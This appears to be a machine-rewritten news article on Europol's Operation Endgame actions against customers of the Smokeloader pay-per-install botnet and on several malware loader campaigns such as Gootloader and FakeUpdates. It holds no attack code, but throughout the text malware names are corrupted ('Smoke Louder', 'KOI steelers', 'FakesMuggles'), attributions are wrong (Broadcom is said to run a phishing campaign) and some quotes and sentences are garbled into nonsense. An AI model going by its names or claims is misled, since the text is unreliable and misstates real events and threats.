Law enforcement has announced that it has tracked down customers of smoke racker malware and has detained at least five individuals.
“In a coordinated series of actions, customers of Smoke Louder Paper Installation Botnet, run by an actor known as a ‘Superstar’, faced with consequences such as arrests, home searches, arrest warrants, and ‘Knock and Talk’,” Europol said in a statement.
The Superstar is said to have run a pay-per-install service that allows customers to use as conduits to deploy the next step payload of their choice, in order to allow customers to gain unauthorized access to the victim’s machine.
According to European law enforcement, the access provided by botnets has been used for a variety of purposes, including key logs, webcam access, ransomware deployment, and cryptocurrency mining.
The latest action, part of a continuous, coordinated exercise called Operation Endgame, that last year led to the dismantling of online infrastructure related to multiple malware loader operations such as IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee, and Trickbot.
Canada, the Czech Republic, Denmark, France, Germany, the Netherlands, and the US participated in follow-up efforts intended to focus on the “demand side” of cybercrime ecosystems.
With each Europol, authorities tracked customers who were registered in previously seized databases, linked online personas to real individuals, and called for questions. An unspecified number of suspects are believed to have chosen to work together to look at personal devices to collect digital evidence.
“Several suspects will relocate services purchased from the Smoke Louder with markup, adding an additional layer of interest in the investigation,” Europol said. “Some of the suspects thought they were no longer law enforcement radar, but they only came to the harsh realisation that they were still targeted.”
Malware Loaders come in a variety of shapes
The development comes as Symantec, owned by Broadcom, has revealed details about a phishing campaign in which Broadcom uses the Windows Screensaver (SCR) file format to distribute a Delphi-based malware loader named Modiloader (aka Dbatloader and Natsolader) to victims’ machines.
It also matches an evasive web campaign where users trick you into running malicious Windows Installer (MSI) files and deploying another loader malware called Legion Loader.
“This campaign uses a method called “pastejacking” or “clipboard hijacking” as viewers are instructed to paste content into the execution window,” says Palo Alto Networks Unit 42, leveraging several cloaking strategies to avoid detection via the Captcha page and impersonating the malware download page as a blog site.
The phishing campaign is also a KOI loader delivery vehicle, which is then used to download and run an information steeler called KOI Stealers as part of a multi-stage infection sequence.
“Utilizing ANTI-VM features by malware such as KOI loaders and KOI steelers highlights the latest threat ability to avoid analysis and detection by analysts, researchers and sandboxes.”
And that’s not all. In recent months, we have once again witnessed the return of Gootloader (aka Slowpour), which spread through Google’s sponsored search results, a technique first discovered in early November 2024.
The attack targets users searching for “non-disclosure agreement templates” on Google and provides fake ads that are redirected to the site when clicked (“Lawliner[.]com”) If you are prompted to enter your email address to receive your document.
“Now that they enter their email, they will receive an email from Lawyer@Skhm[.]According to a security researcher named gootloader, who has been closely monitoring malware loaders for several years, “There is a link to the requested Word document (docx).
“When the user passes all the gates, it downloads a zip JavaScript file. When the user unzips and runs the JavaScript file, the same Gootloader behavior occurs.”
They also discovered a JavaScript downloader known as FakeUpdates (aka Socgholish), which is normally propagated through social engineering ploys that prevent social engineering ploys to deceive users by disguising them as legitimate updates to web browsers like Google Chrome.
“Attackers use compromised resources to distribute malware, inject malicious JavaScript into vulnerable sites, acquire fingerprint hosts, perform eligibility checks, and display fake update pages,” Google said. “Malware is generally delivered via drive-by downloads. Malicious JavaScript acts as a downloader and delivers additional malware.”
It has also been observed that fake browser update attack routes distribute two other JavaScript malware families called FakesMuggles. It was named after the use of HTML smuggling to provide the next step-by-step payload, such as NetSupport Managers, such as Faketreff.
Source link
